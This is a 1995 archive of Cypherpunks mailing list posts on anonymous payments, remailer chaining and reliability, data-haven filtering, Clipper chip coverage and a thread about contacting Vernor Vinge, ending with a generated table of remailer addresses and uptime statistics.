mirage.skypoint.com Sun Jan 8 18:41:03 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Sun, 8 Jan 95 18:41:03 PST Subject: Anonymous payment scheme In-Reply-To: <199501021344.FAA11566@largo.remailer.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199501021344.FAA11566 at largo.remailer.net>, you wrote: > From: skaplin at skypoint.com (Samuel Kaplin) > > I was looking at at the bigger picture. Any merchant who accepts Visa or MC > could now accept anonymous payments. No hassle at all on their part. > [...] > The key > would be not to have the card attached to the account. If the card is > attached to any type of account, then there are reporting requirements. > > Visa was talking about an electronic traveller's check, which, from > what I could tell, instantiated an account in the sum of the value of > the card purchased, which was then drawn down by purchase. The card, > evidently, had no embossing on it. Personalization was limited to > some account id which would last the lifetime of the balance and then > disappear. This is EXACTLY what I was contemplating. I really wish they would implement it. Then I can get the traveler's cheques out of my wallet. (unsigned in both spots of, course.) - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== Be careful when playing under the anvil tree. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLxCfB8lnXxBRSgfNAQH6yAf/RMSqUXOHouTE3qKqaU/naHO8fdr8cEKL EjAemhDQj5yVHeTz4YCT1p16CW8X+++fTXGsfZoCr7c+xxYoj/04OVC/u3UPvpJy kAtwhbZhIG7ndKk2weoxZLTnxl5TVlkYjZUrufSccUw0ZfA6h27WrZNV7jFV89dk c2xPr9oJ8dj/jwJtaNIR2KtTc9THWyxlGEIBzMn4mA1VeFz0I27uPK9RSs0M4eXb JCW/ns92Gzwslq0/3n7d4JctGXar+9cUTjowPYRXinKX7wsyoKj5nN7HrCo8D5ot W0KCfDzkn2YOGCj1CzkRkcW0wiGXI9kBXpCQVXJFlKZ6r7d5QnN0AA== =B73o -----END PGP SIGNATURE----- From speed at cs.washington.edu Sun Jan 8 19:17:30 1995 From: speed at cs.washington.edu (Erik Selberg) Date: Sun, 8 Jan 95 19:17:30 PST Subject: From me to me to you...The Actual Article Message-ID: <199501090318.TAA14113@meitner.cs.washington.edu> Carol Anne Braddock writes: > This is the article, and what I did with it. It is complete in it's > entireity, from the bang paths, to the crosspostings. Please study them > Now, the article, > Date: Sat, 7 Jan 1995 01:26:26 -0600 > From: Carol Anne Braddock > To: carolann at vortex.mm.com > Newsgroups: soc.support.transgendered, alt.transgendered, > mn.general, alt.sex.femdom, alt.artcom, alt.sex.bondage, alt.sex, > comp.infosystems.www.users, alt.dreams.lucid, alt.dreams > Subject: (fwd) Re: Phil Zimmermann So, I don't read any of those groups, and I could be dead wrong on all of this. But I'll yap away anyway. Off the cuff, I'd say your article could be inappropriate. Granted it's a good cause, and you're not advertising for yourself but for a charity. However, charitable spam is still spam (and I'm not calling your article spam... spam lite, maybe). I understand your point about feeling a sense of community with the above groups; however, I think that massive "Please help..." postings can be just as annoying as the MAKE.MONEY.FAST postings. Erik Selberg "I get by with a little help selberg at cs.washington.edu from my friends." http://www.cs.washington.edu/homes/selberg From weidai at eskimo.com Sun Jan 8 19:27:03 1995 From: weidai at eskimo.com (Wei Dai) Date: Sun, 8 Jan 95 19:27:03 PST Subject: Remailer security In-Reply-To: Message-ID: On Mon, 9 Jan 1995, jRT wrote: > > The thing being, say you set up an anonymous-video-or-otherwise-remailer, > you have to ensure that people don't manage to get into that as such > would obviously give away the identities of all parties. Given that > people can supposedly hack the DOD computer system, that doesn't seem so > unlikely, so are anonymous-remailers really all that safe? This is why you want to use a remailer chain instead of just one remailer. Hopefully, not all of the remailers in your chain are subverted by your enemy. (They may all be subverted, but as long as not by people who cooperate with your enemy you're still ok :-) Also, make your chains as heterogeneous as possible. That is, include remailers that use different hardware, operating systems, remailer softwares, are in different countries, are controlled by different organizations, etc., so that one security hole will not compromise your entire chain. I've kinda evaded the original question, which is about the (average?) security of the individual remailers. Does anyone have a real answer? Wei Dai PGP encrypted mail welcome. (I realize a PGP signature says this implicitely, but I left my key in another computer.) From entropy at IntNet.net Sun Jan 8 19:53:13 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 8 Jan 95 19:53:13 PST Subject: Vinge's _A Fire Upon the Deep_ In-Reply-To: Message-ID: > I _WISH_ I had VV's email address! I'd like to send the guy a big thank-you > and ask if he's writing a sequel (yet). If anyone does know it, puh-LEEze > mail me. First book of his I've read, first of it's kind I've enjoyed in a > very long time. I'll scan my favorite crypto-related (legal-length) excerpt > and post it next week, howzat? Ditto that. I've enjoyed all of his works. He's one of my top three favourite SF writers of all time. Any of you who are in contact with VV have an e-mail address for him? He deserves accolades, but snailmail is too slow for my liking. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From wcs at anchor.ho.att.com Sun Jan 8 19:54:12 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Sun, 8 Jan 95 19:54:12 PST Subject: Latency, bandwidth, and anonymity Message-ID: <9501090353.AA13655@anchor.ho.att.com> My initial reaction to "Anonymous video conferencing" was "That's when you wear black ski masks and use voice scramblers and call from video payphones", i.e. not very useful. ("Subcomandata Marcos here...") On the other hand, Wei Dai's followup message about > In the longer term, anonymous communication is in danger of being used > only by fringe groups if it falls too much behind the non-anonymous kind > in terms of latency and bandwidth (and cost, I guess). Maybe ONLY drug > dealers, nuclear terrorists, etc., will use anonymous remailers when full > sensory virtual interaction is the must popular way for most people to > communicate and remailers are still the only choice for the > anonymity-conscious. puts a different spin on it. It's a real problem, if not now, then maybe in 5-10 years. I realize that those of us in the Phone Company who have predicted universal Picturephone in the past have been over-optimistic :-), but the video compression people and the faster-chip people keep bringing us closer to having good-quality low-bandwidth video, and ISDN and fast modems are bringing available loop-end bandwidth up to the point that reasonably-priced circuits can carry it. (Long-haul raw bits have been cheap enough for a while; it's the distribution and switching technology that have a lot of the cost, and providing cheap high-bandwidth circuits makes it hard to make money on voice calls.) The approaches to anonymous video conferencing will depend a bit on whether the technology takes off on the nets or the phone system, if those two are still different by then. It's easier to obscure the origins of a call on the nets, where users own large parts, than it is on the phone system, where the Phone Companies own and operate most of it; the latter environment would require Phone Remailers, such as PBXs you call into on T1 lines and get shuffled out on other circuits - it's hard to get adequate mixing except in rather large environments.... Recircuiting on the nets will be left as an excercise to the reader. I suspect the harder parts of the job may be doing the faces and voices right - anonymous voice conference bridges are ok if the participants mostly don't know each other, but they're less useful if people know each other and cops with computerized voiceprint equipment may be eavesdropping (not common now, though computers and models of the human voice are improving; I suppose voice disguisers may improve from the kid's-toy quality to something better if there's a market, or if computers with full-duplex soundcards become more common.) Faces are harder, and they're not really a crypto problem - how do you fake them well? It's not too hard to do a "quayletool" quality solution that generates moving lips in front of a static picture, even timed with an audio feed, but that won't play too well in the business world, and having the camera pointing at your calendar or home page is only semi-useful. If video-calling evolves on the nets, there'll be a lot more need for speed-matching services, and it may be that computer-enhanced video receiving for high-bandwidth users will fund the technology development for face-simulation? If so, maybe you can use it to start with fake stills instead of real ones? Bill From wcs at anchor.ho.att.com Sun Jan 8 20:49:40 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Sun, 8 Jan 95 20:49:40 PST Subject: Data Haven problems Message-ID: <9501090448.AA14477@anchor.ho.att.com> dfloyd asks for ideas about preventing spamming in data havens, for the code that he's working on. It's a hard job. A related problem is how to prevent your data haven from becoming the porno-ftp site of the week, and either being swamped with traffic or raided by the Post Office Reactionary Neighborhood Police. One way to stop spamming is to charge sufficient money for the service that using it always pays for itself - spamming is then reduced to a source of profit, e.g. no problem. If people want to hire you to store spam, it's their money they're wasting. But that requires an anonymous digital cash infrastructure, which we don't really have yet. And it's a lot less interesting academically (:-) than finding solutions which can also work in a cooperative system, or at least a system that doesn't charge per transaction. Probably the most important step you can take is to build in operator-selectable filtering, because the problems keep changing. Operators probably need to be able to block storage and retrieval by specific users and sites (It's easier to prevent access by president at whitehouse.gov than it is to detect forged requests, and you probably want to keep both real and fake Cantor&Siegel users off, plus the bozo of the month and the broken-remailer of the day.) Some operators may find it useful to limit the amount of data that can be stored or retrieved by a specific user or site, though this is less useful with anonymous and pseudonymous remailers around, since "a specific user" becomes vaguer. Filtering by filename and type can also be useful - if you don't allow files named *.gif and *.jpg, users may be less likely to spam you with pornography. Namespace control in general is an issue - do users get to choose filenames, or list directories, or do they have to know the names of files to retrieve. Another issue is whether files can only be retrieved by the sender - probably a local policy issue. Some sites may only accept encrypted files, which reduces the spam potential considerably, as well as reducing your exposure to the porn police, though it's difficult to do anything about files that are encrypted with a public key whose private key has been posted to the net, or fake crypto headers in an otherwise unencrypted file, unless you put in lots more code to check the insides of files and watch the net for such postings, which is unrealistic. There's also the problem that PGP and especially RIPEM files are non-stealthy, and users may not want to leave even keyids in their files. Bill From wcs at anchor.ho.att.com Sun Jan 8 21:09:23 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Sun, 8 Jan 95 21:09:23 PST Subject: Can someone verify this conjecture for me? Message-ID: <9501090508.AA14605@anchor.ho.att.com> > From: nelson at crynwr.com (Russell Nelson) > > It seems like it solves two separate problems: 1) foiling traffic > > analysis, and 2) foiling a cheater remailer. The problems are > > separate, really, because if you really, really trust the remailer (as > > many people do Julf), then 2) isn't a problem. All you need to do is > > solve 1. Or, you can solve 1) by using a single remailer. A > > necessary but not sufficient step to foil traffic analysis is to strip > > headers. There are a couple of advantages of chaining multiple remailers. One is that traffic analysis is an art, rather than a science, and to really foil it, you've got to know how good it is, which is hard. Long-term patterns may show up even though the traffic mixes are pretty good in the short run, and if you can spread out the remailer use and increase the traffic load, plus constantly sending encrypted traffic between remailers, it does make the job harder. If the Bad Guys can isolate their target to a few remailer users, they can often find the real one by rubber-hose or a small number of wiretaps at the user locations instead of the remailers; that's impractical if there are thousands of potential users in multiple countries across the remailer-chain. Another is that if one good trustable remailer can foil traffic analysis, then multiple remailers increases the chance that at least one of them is good. Sure, Julf's a good guy, but what if the KGB has kidnapped his grandmother, or the CIA has planted wiretaps inside his computer - will you know if it's compromised? There's also the reliability issue - what if the Finnish Phone Company decides Julf is using too much of their resources and cuts him off, or the Mafia steals one of your police-informants' remailers, or the California Public Utilities Commission declares email to be a common carrier and insists on auditing all transactions? Multiple remailer in a strongest-link chain reduce the risks. Bill From lwp at garnet.msen.com Sun Jan 8 21:16:53 1995 From: lwp at garnet.msen.com (Lou Poppler) Date: Sun, 8 Jan 95 21:16:53 PST Subject: Vinge's True Email name ? In-Reply-To: Message-ID: I knew that old compuserve account was good for something. They list Vinge, Vernor San Diego CA 72267.2656 at compuserve.com From cactus at seabsd.hks.net Sun Jan 8 23:23:39 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Sun, 8 Jan 95 23:23:39 PST Subject: Vinge's True Email name ? Message-ID: <199501090729.CAA28854@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article , Lou Poppler wrote: >I knew that old compuserve account was good for something. >They list Vinge, Vernor San Diego CA 72267.2656 at compuserve.com Sigh. Please don't use this, people. I'm sure VV has no desire to pay for oodles of mail telling him just how much people like him. Treat it like a home phone number (of course, some people abuse home phone numbers of famous folks...). - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxCrChNhgovrPB7dAQF7VgQAqsDQM0h7b0VDmBISGd3o0YqYg4q2HYmQ m0g7VtnX3yEU1vi9N96HPilMwe2JGs/6Frlvf9IKMmzGAIJxEQzGdMLbow54Il1/ akV9siQAH7BvKwaEWkzO8dDi6nl83ZtawVXIQNacIb5v9oEIQwK/vw4aYWitmDAv B0eJJUVT1XI= =u+fn - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxDlzSoZzwIn1bdtAQEXTwGAqVqaYnu+0yy8/d0HSZseTDuxP7BBWqGb PuzL4Xpu2HE7DDrIaALalplmGIYrHnun =zr9V -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Sun Jan 8 23:54:29 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 8 Jan 95 23:54:29 PST Subject: Vinge's True Email name ? Message-ID: <199501090800.DAA29142@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- NOTE: This mutation of this thread has no crypto content, but some (awfully specific) privacy relevance. Todd Masco writes: > Lou Poppler wrote: > >I knew that old compuserve account was good for something. > >They list Vinge, Vernor San Diego CA [email address omitted] > Sigh. Please don't use this, people. I'm sure VV has no desire to > pay for oodles of mail telling him just how much people like him. Treat > it like a home phone number (of course, some people abuse home phone > numbers of famous folks...). I began composing a reply precisely to this effect, but was stopped by the words "They list...". If the address appears in some standard Compu$erve email directory, then this was hardly a major transgression. Allow me to suggest a compromise. If some enterprising VV fan would volunteer to collect fan mail from c'punks, then forward it all, everyone involved might be fairly satisfied. Disclaimer: I'm not familiar with the details of CI$'s fee schedule; if one pays by sheer volume and not number of messages, then obviously this approach won't alleviate the burden. Maybe then someone could volunteer actually to ask VV whether/how he'd like to hear from fans.... - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLxDr62f7YYibNzjpAQGxAwP+LloeLQS/BJcZciApmMWEvmOhSaCQJX8u uuwzprP2ZYTmbsb08lfTHnofS1TXKmoZ3BrYdiqjugaCTKFweg8BSZ2vw5i6KplV x2ArBnejYPKjtqs3C12mf8WJrgjnKdMZ9LxLgjlE1ymELG1bhH0loIyq3YX3x46G 69hvZyz/qQ8= =h05K - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxDtAyoZzwIn1bdtAQHLNAF+LEFF+UniR9jrXSZxd6Ia9L5aJIXjFFt3 J9aUAIUQKXf0o5ytM2nHYUvj7v0cWhn6 =e+gV -----END PGP SIGNATURE----- From weidai at eskimo.com Mon Jan 9 00:04:06 1995 From: weidai at eskimo.com (Wei Dai) Date: Mon, 9 Jan 95 00:04:06 PST Subject: Vinge's True Email name ? In-Reply-To: <199501090729.CAA28854@bb.hks.net> Message-ID: On Mon, 9 Jan 1995, L. Todd Masco wrote: > Sigh. Please don't use this, people. I'm sure VV has no desire to > pay for oodles of mail telling him just how much people like him. Treat > it like a home phone number (of course, some people abuse home phone > numbers of famous folks...). A general hint for finding authors' e-mail addresses: figure out where he/she works from the book jacket, use WHOIS to find their domain name, and then finger them or look at their web page to see if they have an e-mail directory. (Now keep this a secret! I don't want the internet.masses to find out my e-mail address when I become rich and famous! :-) I bet Vinge has written for himself a really intelligent filter like the kind he describes in AFUtD. Of course I wouldn't want to test this. I guess this is not really related to cypherpunks, except to the general philosophy of making tools to protect oneself, instead of relying on the good will (and intelligence) of others. Wei Dai From cactus at hks.net Mon Jan 9 00:31:37 1995 From: cactus at hks.net (L. Todd Masco) Date: Mon, 9 Jan 95 00:31:37 PST Subject: More signal than YOU can handle. Message-ID: <199501090837.DAA29692@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- For the moment, all of the archives that Eric just dropped me are on ftp://ftp.hks.net/cypherpunks/All I'll be making some primitive engines to access individual articles by various means but I thought I'd put 'em up in case anybody else with more disk space than brains would like to snarf 'em (following the Shulgin model). (By the way, Glimpse looks like it'll be ideal, since everything is already in its own file, the "since June" archive currently being our /usr/spool/news/... dir.) Look for more info in this space (that sucking sound is my copious free time). - - -- Todd. - -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAwUBLxD1GBNhgovrPB7dAQEOQAQAuTRIVTQOzIbjqrUAFsPu3xHTJAH+3YnX ickYtw627leo3vs7wD2rxGfHNx6As7JbzSI1JwD26zsb2CMqMGgvQHNQ5eD7rW/N 3ICSWACwESWlnL/rAFvVh69mZDM/IUv5C+eSTVHKdlh3KWYbetRvCgkRNQvGVl58 S06pthGBpJ8= =f4fe - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxD1nyoZzwIn1bdtAQEv7wGAhSVywzGivjeo9fZwVrYDRaJx596TPVeJ pjutyvubg3yyKmqFD+Ele62LhiPvhxtX =pooh -----END PGP SIGNATURE----- From tcmay at netcom.com Mon Jan 9 00:46:58 1995 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 9 Jan 95 00:46:58 PST Subject: Vinge's True Email name ? In-Reply-To: <199501090800.DAA29142@bb.hks.net> Message-ID: <199501090847.AAA23833@netcom2.netcom.com> L. McCarthy wrote: > I began composing a reply precisely to this effect, but was stopped by the > words "They list...". If the address appears in some standard Compu$erve > email directory, then this was hardly a major transgression. > > Allow me to suggest a compromise. If some enterprising VV fan would volunteer > to collect fan mail from c'punks, then forward it all, everyone involved > might be fairly satisfied. As I described in a post last summer, I was at a party that Vernor was at, and several of us stayed over until Sunday afternoon (it being deep in the mountains of Marin and all, a long drive)). Eric Hughes was there. Anyway, I talked about all this in that post. Vernor was there until Sunday night, too, when the party hosts drove him off to SFO (the airport, for the TLA-impaired) and I dropped Eric off in Berkeley on my way home to Santa Cruz. The point I'm making? First, Vernor had gotten some Cypherpunks posts forwarded to him by that time, mostly by Russell Whittaker. He is well-aware that the Cypherpunks list exists, and one must presume that if he wanted to be on the list, he could be on it easily. (I doubt his CompuSlave account is his only one, as he's on the faculty at San Diego State, and hence has the usual access. I suspect he uses the CompuServe account for his rec.arts.sf-lovers sort of mail; just a hunch.) Second, he was aware of--and generally pleased by--the explicit role "True Names" played in the early motivation for our activities. (As is well known, the works of Chaum, Vinge, Card, Stephenson, Brunner, and others played major roles.) Third, for the curious, he _is_ working on a sequel to "AFUTD." Contact him if you wish, but bear in mind that the more time he has to spend reading and answering e-mail, the less work he'll get done on his SF writing. (And if he has to spend many hours getting his HyperMIME-JPEG3 SLIP system running to see "Vernor Rulez!" in 80-point type, he may truly decide he's been marooned in realtime.) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From weidai at eskimo.com Mon Jan 9 00:56:36 1995 From: weidai at eskimo.com (Wei Dai) Date: Mon, 9 Jan 95 00:56:36 PST Subject: Latency, bandwidth, and anonymity In-Reply-To: <9501090353.AA13655@anchor.ho.att.com> Message-ID: On Sun, 8 Jan 1995 wcs at anchor.ho.att.com wrote: > My initial reaction to "Anonymous video conferencing" was > "That's when you wear black ski masks and use voice scramblers > and call from video payphones", i.e. not very useful. > ("Subcomandata Marcos here...") Video conferencing was just ONE of the applications of high-bandwidth, low-latency anonymous communication. Maybe it was a bad example. Here's a couple more: 1. anonymous distributed computing: suppose Alice wants to help Bob crack a secret key by using both of their computers, but the algorithm entails some heavy exchange of data between them 2. anonymous remote consulting: Alice is building a nuclear bomb and needs help, so she sends a live video feed of her workshop to Bob (and have the computer blot out her face in real time). Bob sends Alice an audio only commentary of what Alice is doing wrong. We tend to focus on the more exotic applications of these tools, but as mjk pointed out they will have perfectly ordinary uses by people who simply don't want everyone in the world to be able to know everything about them. Maybe Alice just wants to call AT&T to ask about their Clipper phone, and not have everybody realize that and send her a bunch of propaganda about Voice PGP. :-) Even now, this may not be as implausible as it sounds. What if Alice is using MCI as the long distance carrier, and MCI happens to be selling Voice PGP? Wei Dai From lmccarth at ducie.cs.umass.edu Mon Jan 9 01:27:51 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 9 Jan 95 01:27:51 PST Subject: PV Advocate on Clipper in `95 Message-ID: <199501090933.EAA03532@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Just ran across a pretty nice (IMHO) short piece of media coverage of Clipper in a local weekly, the [Pioneer] Valley Advocate. This is item #85 in the "Tech Check" section of their list of "95 Things to Watch for in 1995". Joint authors of the whole forecast are: Mark Kendall Anderson, Everett Hafner, Stephanie Kraft, Tom Mudd, Steve Penhollow, Chris Rohmann, David Simons, Michael Strohl, and Rob Weir. ------------------ begin included text ---------------------- 85. Clipper Clipping Along Unfortunately, the failure of the mainstream media to cover the government's steamroller tactics in technology policy may well continue. The ``Clipper Chip,'' what NSA, CIA and FBI spooks see as the ideal data protection measure, stands to become national standard if all goes as planned. That is, as more people communicate with digital devices (computers and TVs and eventually telephones and faxes) the need to scramble and unscramble communications will increase -- ideally so that the phone conversation you have with your uncle or the email you send to a co-worker is private and unintelligible to anyone else. However, in the brave new world as it currently is being designed, the feds will also be able to decode every digital signal the Clipper chip scrambles. Consequently, drug kingpins, mafiosi, and anyone else requiring secure communications will have it (real data encryption is cheap and relatively easy to implement), while the remaining information consumers will have Big Brother to contend with. --------------------- end included text ---------------------- FYI, the Advocate accepts letters at 71632.100 at compuserve.com. -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLxEBwmf7YYibNzjpAQFdkgQAkciJkPMXESO9yvl3jKaH7WT6H4wGcgfG W8KyX2myH1zOmN/aZAQVSWX/Rtrs3r+gTwIlCf7DVhFnp1n+lImzrs/T8pKTx/25 gh30s6sm0AGrxcxCV8rgKbXT4KCdPOlXT+kTp5wWaLYBqbZlogvyQIivW3GLZ1U/ 9YnjTb0OXNk= =DaLq - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxEC7CoZzwIn1bdtAQEl6AGAtktxeMXLzVqxHi/0qhEgGRtlCg5Oq/aa O/RrNyyqbV8eKzSr/n06bt98bGfRfbgY =ullh -----END PGP SIGNATURE----- From asgaard at sos.sll.se Mon Jan 9 03:07:59 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Mon, 9 Jan 95 03:07:59 PST Subject: Data Haven problems In-Reply-To: <9501090448.AA14477@anchor.ho.att.com> Message-ID: wcs at anchor.ho.att.com wrote: > Filtering by filename and type can also be useful - if you don't allow > files named *.gif and *.jpg, users may be less likely to > spam you with pornography. Hardly. (*.gi0 and *.jp0 for a start?) But what are data havens for, if not for controversial data? One of the greatest needs, if not _the_ greatest, in our times for a data haven is probably for storing porno. There is a tremendous, world-wide demand for porno. Yet, there are numerous countries where sex.gif's found on your disk (encrypted or not, they can use thumb-screws to force the key out of your hands) will put you in a very difficult situation (loss of social status, jail, decapitation). It might be much more convenient for, let's say, a Saudi teenager to store his encrypted private gif's in a data haven in Sweden, download them when he feels the urge and purge the copies after every use. Mats From perry at imsi.com Mon Jan 9 03:51:37 1995 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 9 Jan 95 03:51:37 PST Subject: Vinge's True Email name ? In-Reply-To: Message-ID: <9501091150.AA22634@snark.imsi.com> Lou Poppler says: > I knew that old compuserve account was good for something. > They list Vinge, Vernor San Diego CA 72267.2656 at compuserve.com Too bad for him that he used his true name. Now lots of "fans" are going to bother him.... .pm From rockwell at nova.umd.edu Mon Jan 9 05:11:16 1995 From: rockwell at nova.umd.edu (Raul Deluth Miller) Date: Mon, 9 Jan 95 05:11:16 PST Subject: remailers Message-ID: <199501091310.IAA13683@nova.umd.edu> I'm wondering if I understand this remailer debate. Here's my summary (based not so much on reading of cypherpunk traffic, but on my understanding of the basic principles): (*) define an encrypting mailer protocol (basically, just PGP or some such). When a mailer receives an encrypted message, it unpacks (0) a message which may have been doubly encoded (once by originator, once by prior remailer to disguise padding) -- if so, must decrypt twice. (1) the message to be forwarded, annotated with control info (e.g. padding, delay, key to reencrypt under) (2) payment information in whatever format is advertised for that remailer. As I understand it the problem with digital cash is defining physical link for the "cash", without compromising the identity of whoever payed into the account. The proposal-to-date involves a guild of remailers. As I see it, this would be primarily of value for shuffling cash around -- call it a build of bankers instead. Once you've established your "cash"-net, presumably with related services such as drop-boxes and temporary accounts, you could use more flexible mechanisms for anonymous mail, which feed off the cash net where necessary. I've not read Chaum(sp?)'s work on encrypted cash, so perhaps I've ignored some terribly obvious issues. [No PGP signature -- at the moment, I don't have a host sufficiently secure to be worth bothering with.] -- Raul D. Miller N=:((*/pq)&|)@ NB. public e, y, n=:*/pq P=:*N/@:# NB. */-.,e e.&factors t=:*/<:pq 1=t|e*d NB. (,-:<:)pq is four large primes, e medium x-:d P,:y=:e P,:x NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d From raph at CS.Berkeley.EDU Mon Jan 9 06:48:43 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 9 Jan 95 06:48:43 PST Subject: List of reliable remailers Message-ID: <199501091450.GAA27265@kiwi.CS.Berkeley.EDU> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"c2"} = " eric pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk pgp hash latent cut post ek"; $remailer{"rahul"} = " cpunk"; $remailer{"mix"} = " cpunk hash latent cut ek"; $remailer{"q"} = " cpunk hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. Last ping: Mon 9 Jan 95 6:00:01 PST remailer email address history latency uptime ----------------------------------------------------------------------- nately remailer at nately.ucsd.edu ++++++++++ 1:28:30 99.99% rahul homer at rahul.net **#**##****# 4:31 99.99% mix mixmaster at nately.ucsd.edu ++-+-++-++ 48:36 99.99% penet anon at anon.penet.fi *+****+***** 28:32 99.99% vox remail at vox.xs4all.nl ----------- 14:34:13 99.99% usura usura at replay.com -- -+--+*** 22:31 99.44% bsu-cs nowhere at bsu-cs.bsu.edu +##**##***+# 23:14 99.26% ideath remailer at ideath.goldenbear.com * --- ----- 2:08:58 99.12% q q at c2.org --+--*++-- 2:33:18 98.62% soda remailer at csua.berkeley.edu -..-.- ... 8:10:14 98.47% alumni hal at alumni.caltech.edu ++ *-**+**** 7:37 97.74% portal hfinney at shell.portal.com ** *-#*#*#** 5:32 97.74% c2 remail at c2.org *--*+* *+ 1:13:45 95.50% desert remail at desert.xs4all.nl _.----.--- 19:54:01 94.80% extropia remail at extropia.wimsey.com ++__ +++++ 13:02:14 84.83% xs4all remailer at xs4all.nl *-- -+*** 16:29 76.54% rebma remailer at rebma.mn.org -*___-__- 31:31:05 70.47% flame tomaz at flame.sinet.org -*-*+ 29:22 37.83% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). Options and features cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. oldpgp Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: 